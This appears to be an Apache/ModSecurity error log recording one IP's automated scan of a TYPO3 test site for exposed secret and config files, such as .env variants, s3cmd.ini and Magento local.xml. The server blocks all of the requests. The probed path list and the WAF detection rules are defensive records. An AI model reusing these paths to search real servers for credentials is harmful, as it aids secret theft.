[Mon Sep 30 03:12:43.510544 2024] [:error] [pid 2293079] [client 45.135.232.70:55280] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/ormconfig.json"] [unique_id "Zvn7C4PBuFIGO_F-AsknvwAAABI"]
[Mon Sep 30 03:12:43.510703 2024] [:error] [pid 2293079] [client 45.135.232.70:55280] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/ormconfig.json"] [unique_id "Zvn7C4PBuFIGO_F-AsknvwAAABI"]
[Mon Sep 30 03:12:43.512178 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:55864] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secure
[Mon Sep 30 03:12:43.521273 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:55790] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/search
[Mon Sep 30 03:12:43.577689 2024] [authz_core:error] [pid 2293076] [client 45.135.232.70:55682] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/redis.conf
[Mon Sep 30 03:12:43.610760 2024] [authz_core:error] [pid 2293080] [client 45.135.232.70:55428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.614889 2024] [authz_core:error] [pid 2293090] [client 45.135.232.70:55448] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php-fpm.conf
[Mon Sep 30 03:12:43.618463 2024] [:error] [pid 2293099] [client 45.135.232.70:55566] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "Zvn7CwPyyxcKczMGbeIudwAAAB8"]
[Mon Sep 30 03:12:43.618706 2024] [:error] [pid 2293099] [client 45.135.232.70:55566] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "Zvn7CwPyyxcKczMGbeIudwAAAB8"]
[Mon Sep 30 03:12:43.618865 2024] [:error] [pid 2293099] [client 45.135.232.70:55566] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "Zvn7CwPyyxcKczMGbeIudwAAAB8"]
[Mon Sep 30 03:12:43.623622 2024] [authz_core:error] [pid 2293100] [client 45.135.232.70:55402] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.633896 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:56002] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/services
[Mon Sep 30 03:12:43.657435 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:55764] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/scripts
[Mon Sep 30 03:12:43.679562 2024] [authz_core:error] [pid 2293094] [client 45.135.232.70:55872] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secure
[Mon Sep 30 03:12:43.722604 2024] [authz_core:error] [pid 2293090] [client 45.135.232.70:56026] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/services
[Mon Sep 30 03:12:43.724602 2024] [authz_core:error] [pid 2293080] [client 45.135.232.70:55986] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/seminovos
[Mon Sep 30 03:12:43.740539 2024] [:error] [pid 2293061] [client 45.135.232.70:55916] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/payment/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env"] [unique_id "Zvn7C_4plfEpgwUkwScOjAAAAAc"]
[Mon Sep 30 03:12:43.740816 2024] [:error] [pid 2293061] [client 45.135.232.70:55916] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env"] [unique_id "Zvn7C_4plfEpgwUkwScOjAAAAAc"]
[Mon Sep 30 03:12:43.740959 2024] [:error] [pid 2293061] [client 45.135.232.70:55916] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env"] [unique_id "Zvn7C_4plfEpgwUkwScOjAAAAAc"]
[Mon Sep 30 03:12:43.796325 2024] [:error] [pid 2293105] [client 45.135.232.70:55482] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prisma/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prisma/.env"] [unique_id "Zvn7C9gxSvKzLJ_dV5ZYxwAAACU"]
[Mon Sep 30 03:12:43.796590 2024] [:error] [pid 2293105] [client 45.135.232.70:55482] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prisma/.env"] [unique_id "Zvn7C9gxSvKzLJ_dV5ZYxwAAACU"]
[Mon Sep 30 03:12:43.796743 2024] [:error] [pid 2293105] [client 45.135.232.70:55482] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prisma/.env"] [unique_id "Zvn7C9gxSvKzLJ_dV5ZYxwAAACU"]
[Mon Sep 30 03:12:43.798137 2024] [:error] [pid 2293104] [client 45.135.232.70:55558] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/public.key"] [unique_id "Zvn7C2mICwha5LRaBfZnmwAAACQ"]
[Mon Sep 30 03:12:43.798476 2024] [:error] [pid 2293104] [client 45.135.232.70:55558] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public.key"] [unique_id "Zvn7C2mICwha5LRaBfZnmwAAACQ"]
[Mon Sep 30 03:12:43.798617 2024] [:error] [pid 2293104] [client 45.135.232.70:55558] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public.key"] [unique_id "Zvn7C2mICwha5LRaBfZnmwAAACQ"]
[Mon Sep 30 03:12:43.812419 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:55732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/resources
[Mon Sep 30 03:12:43.813739 2024] [authz_core:error] [pid 2293081] [client 45.135.232.70:55484] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/proftpd.conf
[Mon Sep 30 03:12:43.846019 2024] [:error] [pid 2293080] [client 45.135.232.70:55852] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /secure/credentials/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/secure/credentials/.env"] [unique_id "Zvn7C3BLBqRWr9u4PC3oWwAAABM"]
[Mon Sep 30 03:12:43.846259 2024] [:error] [pid 2293080] [client 45.135.232.70:55852] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/secure/credentials/.env"] [unique_id "Zvn7C3BLBqRWr9u4PC3oWwAAABM"]
[Mon Sep 30 03:12:43.846402 2024] [:error] [pid 2293080] [client 45.135.232.70:55852] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/secure/credentials/.env"] [unique_id "Zvn7C3BLBqRWr9u4PC3oWwAAABM"]
[Mon Sep 30 03:12:43.847485 2024] [authz_core:error] [pid 2293096] [client 45.135.232.70:55838] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secure
[Mon Sep 30 03:12:43.848782 2024] [authz_core:error] [pid 2293090] [client 45.135.232.70:55778] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/s3cmd.ini
[Mon Sep 30 03:12:43.871001 2024] [:error] [pid 2293076] [client 45.135.232.70:55928] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/payment/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env.production"] [unique_id "Zvn7C4jfoPBL6okhrqWKXgAAAA8"]
[Mon Sep 30 03:12:43.871183 2024] [:error] [pid 2293076] [client 45.135.232.70:55928] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env.production"] [unique_id "Zvn7C4jfoPBL6okhrqWKXgAAAA8"]
[Mon Sep 30 03:12:43.871335 2024] [:error] [pid 2293076] [client 45.135.232.70:55928] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env.production"] [unique_id "Zvn7C4jfoPBL6okhrqWKXgAAAA8"]
[Mon Sep 30 03:12:43.876599 2024] [authz_core:error] [pid 2293101] [client 45.135.232.70:55948] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Mon Sep 30 03:12:43.895394 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:55326] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/platformio.ini
[Mon Sep 30 03:12:43.897429 2024] [:error] [pid 2293075] [client 45.135.232.70:55260] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/package-lock.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package-lock.json found within REQUEST_FILENAME: /package-lock.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "Zvn7C5FcefiV9attqbch-wAAAA4"]
[Mon Sep 30 03:12:43.897652 2024] [:error] [pid 2293075] [client 45.135.232.70:55260] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "Zvn7C5FcefiV9attqbch-wAAAA4"]
[Mon Sep 30 03:12:43.897786 2024] [:error] [pid 2293075] [client 45.135.232.70:55260] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "Zvn7C5FcefiV9attqbch-wAAAA4"]
[Mon Sep 30 03:12:43.899585 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:56016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yml
[Mon Sep 30 03:12:43.904357 2024] [authz_core:error] [pid 2293093] [client 45.135.232.70:55192] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.916700 2024] [authz_core:error] [pid 2293105] [client 45.135.232.70:56074] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/shop
[Mon Sep 30 03:12:43.924491 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:56078] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/site_cg
[Mon Sep 30 03:12:43.934645 2024] [authz_core:error] [pid 2293081] [client 45.135.232.70:56062] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/setup.cfg
[Mon Sep 30 03:12:43.938903 2024] [authz_core:error] [pid 2293103] [client 45.135.232.70:56108] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/smb.conf
[Mon Sep 30 03:12:43.944372 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:56138] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/sphinx
[Mon Sep 30 03:12:43.966616 2024] [authz_core:error] [pid 2293096] [client 45.135.232.70:56096] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/slr
[Mon Sep 30 03:12:43.986324 2024] [authz_core:error] [pid 2293077] [client 45.135.232.70:56154] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/sphinxsearch
[Mon Sep 30 03:12:44.012144 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:56126] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/sphinx.conf
[Mon Sep 30 03:12:44.016443 2024] [:error] [pid 2293105] [client 45.135.232.70:56336] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /store/app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/store/app/etc/local.xml"] [unique_id "Zvn7DNgxSvKzLJ_dV5ZYyQAAACU"]
[Mon Sep 30 03:12:44.016676 2024] [:error] [pid 2293105] [client 45.135.232.70:56336] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/store/app/etc/local.xml"] [unique_id "Zvn7DNgxSvKzLJ_dV5ZYyQAAACU"]
[Mon Sep 30 03:12:44.016836 2024] [:error] [pid 2293105] [client 45.135.232.70:56336] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/store/app/etc/local.xml"] [unique_id "Zvn7DNgxSvKzLJ_dV5ZYyQAAACU"]
[Mon Sep 30 03:12:44.019115 2024] [authz_core:error] [pid 2293075] [client 45.135.232.70:56196] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/src
[Mon Sep 30 03:12:44.022252 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:56324] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tmp
[Mon Sep 30 03:12:44.026332 2024] [:error] [pid 2293093] [client 45.135.232.70:56242] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/myapp/.env.staging.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/myapp/.env.staging.local"] [unique_id "Zvn7DAuRlt312CS_gC1yYQAAABs"]
[Mon Sep 30 03:12:44.026583 2024] [:error] [pid 2293093] [client 45.135.232.70:56242] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/myapp/.env.staging.local"] [unique_id "Zvn7DAuRlt312CS_gC1yYQAAABs"]
[Mon Sep 30 03:12:44.026736 2024] [:error] [pid 2293093] [client 45.135.232.70:56242] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/myapp/.env.staging.local"] [unique_id "Zvn7DAuRlt312CS_gC1yYQAAABs"]
[Mon Sep 30 03:12:44.033521 2024] [authz_core:error] [pid 2293103] [client 45.135.232.70:56310] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Mon Sep 30 03:12:44.042360 2024] [authz_core:error] [pid 2293094] [client 45.135.232.70:56396] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/supervisord.conf
[Mon Sep 30 03:12:44.044066 2024] [authz_core:error] [pid 2293081] [client 45.135.232.70:56498] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/usr
[Mon Sep 30 03:12:44.125361 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:56330] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:44.133771 2024] [authz_core:error] [pid 2293075] [client 45.135.232.70:56258] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tmp
[Mon Sep 30 03:12:44.138681 2024] [:error] [pid 2293103] [client 45.135.232.70:56282] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/myapp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/myapp/.env"] [unique_id "Zvn7DOFuA41g1eDWyEH0_wAAACM"]
[Mon Sep 30 03:12:44.138951 2024] [:error] [pid 2293103] [client 45.135.232.70:56282] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/myapp/.env"] [unique_id "Zvn7DOFuA41g1eDWyEH0_wAAACM"]
[Mon Sep 30 03:12:44.139106 2024] [:error] [pid 2293103] [client 45.135.232.70:56282] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/myapp/.env"] [unique_id "Zvn7DOFuA41g1eDWyEH0_wAAACM"]
